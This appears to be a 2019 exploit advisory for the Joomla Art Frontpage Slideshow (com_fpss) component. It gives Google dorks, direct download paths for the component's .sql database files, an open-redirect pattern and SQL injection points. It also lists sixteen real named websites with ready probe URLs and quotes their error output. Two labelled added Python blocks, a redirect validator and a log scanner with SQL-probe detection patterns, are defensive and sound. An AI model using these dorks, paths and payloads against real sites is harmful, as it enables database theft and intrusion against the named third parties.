####################################################################################################
# Exploit Title : Joomla FPSS Art Frontpage Slideshow Components 1.6.0 Database Disclosure / Open Redirection / SQL Injection
# Author [ Discovered By ] : KingSkrupellos
# Team : Cyberizm Digital Security Army
# Date : 19/01/2019
# Vendor Homepage : artetics.com
# Software Information Link : joomlaworks.net/extensions/commercial/frontpage-slideshow
# Software Download Link : extensions.joomla.org/extension/art-frontpage-slideshow/
# Affected Versions : 1.5.3 and 1.6.0
# Tested On : Windows and Linux
# Category : WebApps
# Exploit Risk : Medium
# Google Dorks : inurl:/index.php?option=com_fpss
#                inurl:"/administrator/components/com_fpss/"
# Vulnerability Type : CWE-264 - [ Permissions, Privileges, and Access Controls ]
#                      CWE-23 - [ Relative Path Traversal ]
#                      CWE-200 - [ Information Exposure ]
#                      CWE-530 - [ Exposure of Backup File to an Unauthorized Control Sphere ]
#                      CWE-89 - [ Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') ]
####################################################################################################
Joomla FPSS Art Frontpage Slideshow Components 1.6.0 Database Disclosure / Open Redirection / SQL Injection
####################################################################################################
# Description :
*************
Art Frontpage Slideshow is a slideshow module that adds front-end animation
to attract visitors and lets a site show images of featured products
and news in an eye-catching way.
####################################################################################################
# Database Disclosure Exploit :
***************************
/administrator/components/com_fpss/fpss.sql
/administrator/components/com_fpss/install.mysql.sql
# Open Redirection Exploit :
*************************
/index.php?option=com_fpss&task=track&id=[ID-NUMBER]&url=[SITE-ADDRESS]
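Added defensive illustration, not code from the FPSS component (the component's track handler is not on this page): a validator for a redirect parameter such as the url value above. It accepts only an absolute path on the same site and rejects every form a browser would treat as leaving the site (absolute URLs, protocol-relative "//host", backslash and percent-encoded variants, header-injection characters). The function name and the fallback target are assumptions.

```python
"""Same-site-only validation for a user-supplied redirect target.

Added example; not the FPSS component's code. Policy: the value must be an
absolute path on this site ("/..."), judged on its percent-decoded form so
encoded tricks cannot bypass the checks; anything else falls back to `default`.
"""
from urllib.parse import unquote


def safe_redirect_target(raw_url: str, default: str = "/") -> str:
    """Return raw_url if it is a plain same-site path, otherwise `default`."""
    if not raw_url:
        return default

    # Judge the decoded form: %2F%2Fhost and %0D%0A must not slip past the checks below
    decoded = unquote(raw_url)

    # Browsers treat "\" like "/", so "/\host" becomes "//host"; normalise it the same way
    decoded = decoded.replace("\\", "/")

    # CR, LF or NUL in a Location value enable header injection / truncation
    if any(c in decoded for c in "\r\n\0"):
        return default

    # Must start with a single "/" on this site. "//host" is protocol-relative (off-site),
    # and anything not starting with "/" (http:, javascript:, bare hostnames) is rejected.
    if not decoded.startswith("/") or decoded.startswith("//"):
        return default

    # Return the original (still encoded) value so the application does not double-decode it
    return raw_url


if __name__ == "__main__":
    for candidate in ("/index.php?option=com_content", "//attacker.invalid/",
                      "%2F%2Fattacker.invalid", "/\\attacker.invalid", "javascript:alert(1)"):
        print(repr(candidate), "->", safe_redirect_target(candidate))
```

Returning the raw value rather than the decoded one matters: the decoded string is only used for the decision, so a legitimate target like /search?q=a%26b keeps its encoding and its meaning.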
# SQL Injection Exploit :
***********************
/index.php?option=com_fpss&task=module&id=[ID-NUMBER]&format=feed&type=[SQL Injection]
/index.php?option=com_fpss&task=module&id=[ID-NUMBER]&format=feed&type=atom&lang=[SQL Injection]
/index.php?option=com_fpss&view=article&id=[ID-NUMBER]:article-[ARTICLE-NUMBER]&catid=[ID-NUMBER]:articles&Itemid=[SQL Injection]
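Added detection example, not part of the advisory or of the FPSS component: a scanner over access-log lines that flags the three request patterns described above (direct retrieval of the com_fpss .sql files, a track redirect whose url points off-site, and quote or keyword probes in the type, lang and Itemid parameters). The combined log layout, the client addresses, the .invalid hostname and the site host are constructed values.

```python
"""Detection over web-server access logs for the three com_fpss request patterns
listed in this advisory. Added example, not code from the advisory or from the
FPSS component; log lines, addresses and the site host below are constructed."""
import re
from urllib.parse import urlsplit, parse_qs, unquote

# Apache/nginx "combined" layout: client, ident, user, [time], "METHOD target PROTO", status, size
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+) [^"]*" (\d{3}) (\S+)')

# Backup / installer SQL files the advisory shows being fetched directly
SQL_FILE_RE = re.compile(r'/administrator/components/com_fpss/[^/?]+\.sql$', re.I)

# Parameters the advisory names as injection points (module feed and article views)
INJECTABLE_PARAMS = ("type", "lang", "Itemid")
# Cheap SQL-probe signature: quotes, comment openers, or classic keywords / functions
INJECTION_MARKERS = re.compile(r"['\"]|--|/\*|\bunion\b|\bselect\b|\bsleep\(|\bbenchmark\(", re.I)


def classify(request_target: str, site_host: str) -> list:
    """Return finding labels for one request target (path plus query); [] if nothing matched."""
    findings = []
    parts = urlsplit(request_target)
    path = unquote(parts.path)
    qs = parse_qs(parts.query, keep_blank_values=True)  # values are percent-decoded here

    if SQL_FILE_RE.search(path):
        findings.append("fpss_sql_file_access")

    if qs.get("option") != ["com_fpss"]:
        return findings

    if qs.get("task", [""])[0] == "track" and "url" in qs:
        target = urlsplit(qs["url"][0])
        host = target.netloc.lower()
        # Off-site authority, or a scheme with no authority (e.g. javascript:), is the redirect-abuse shape
        if (host and host != site_host.lower()) or (target.scheme and not host):
            findings.append("fpss_offsite_redirect")

    for name in INJECTABLE_PARAMS:
        for value in qs.get(name, []):
            if INJECTION_MARKERS.search(value):
                findings.append("fpss_sqli_probe:" + name)
    return findings


def scan_log(lines, site_host: str) -> list:
    """Return (client, request_target, findings) for every parseable line with a finding."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        client, _ts, _method, target, _status, _size = m.groups()
        findings = classify(target, site_host)
        if findings:
            hits.append((client, target, findings))
    return hits


# Constructed sample lines (RFC 5737 documentation addresses, reserved .invalid host)
SAMPLE_LOG = [
    '203.0.113.5 - - [19/Jan/2019:10:00:01 +0000] "GET /administrator/components/com_fpss/install.mysql.sql HTTP/1.1" 200 5120 "-" "curl/7.64.0"',
    '203.0.113.5 - - [19/Jan/2019:10:00:02 +0000] "GET /index.php?option=com_fpss&task=track&id=3&url=http://attacker.invalid/ HTTP/1.1" 303 0 "-" "Mozilla/5.0"',
    '203.0.113.9 - - [19/Jan/2019:10:00:03 +0000] "GET /index.php?option=com_fpss&task=module&id=87&format=feed&type=atom&lang=1%27 HTTP/1.1" 500 213 "-" "Mozilla/5.0"',
    '198.51.100.2 - - [19/Jan/2019:10:00:04 +0000] "GET /index.php?option=com_fpss&task=track&id=3&url=/index.php/news HTTP/1.1" 303 0 "-" "Mozilla/5.0"',
    '198.51.100.2 - - [19/Jan/2019:10:00:05 +0000] "GET /index.php?option=com_fpss&view=article&id=282:article-3&catid=41:articles&Itemid=450 HTTP/1.1" 200 8801 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for client, target, findings in scan_log(SAMPLE_LOG, "www.example.org"):
        print(client, ",".join(findings), target)
```

The last two sample lines are the benign shapes (a same-site track redirect and a plain article view) and produce no finding; a 500 status on a feed request with a quoted lang value, as in the third line, is the combination worth alerting on first, since it matches the error output the advisory reproduces below.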
####################################################################################################
# Example Vulnerable Sites :
*************************
[+] kancelarija.org.mk/index.php?option=com_fpss&task=module&id=87&format=feed&type=atom&lang=1%27
[+] spalya.com.mx/index.php?option=com_fpss&view=article&id=282:article-3&catid=41:articles&Itemid=450%27
[+] uaddigital.com/main/index.php?option=com_fpss&task=module&id=27&format=feed&type=1%27
[+] cvbsaude.org/administrator/components/com_fpss/install.mysql.sql
[+] bio.demokritos.gr/new_site/administrator/components/com_fpss/fpss.sql
[+] akademisinergi.com/administrator/components/com_fpss/install.mysql.sql
[+] studioscosta.gr/tmp/administrator/components/com_fpss/install.mysql.sql
[+] fupacnl.com.br/picture_library/administrator/components/com_fpss/install.mysql.sql
[+] pathfinderindemnity.com/administrator/components/com_fpss/install.mysql.sql
[+] alkartasunalizeoa.eus/administrator/components/com_fpss/install.mysql.sql
[+] muslimfamilyservices.org/site/administrator/components/com_fpss/install.mysql.sql
[+] shswadsworth.org/administrator/components/com_fpss/install.mysql.sql
[+] tjnisseki.com/administrator/components/com_fpss/install.mysql.sql
[+] telecomreviewna.com/administrator/components/com_fpss/install.mysql.sql
[+] waterpng.com.pg/site/administrator/components/com_fpss/install.mysql.sql
[+] marinelog.com/administrator/components/com_fpss/install.mysql.sql
####################################################################################################
# Example SQL Database Error :
Warning: session_start() [function.session-start]: Cannot send session cookie - headers already sent by (output started at /home/content/64/4351964/html/configuration.php:1) in /home/content/64/4351964/html/libraries/joomla/session/session.php on line 423
Strict Standards: Non-static method JLoader::import() should not be called statically in /home/uadvirtual/public_html/main/libraries/joomla/import.php on line 29
####################################################################################################
# Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team
####################################################################################################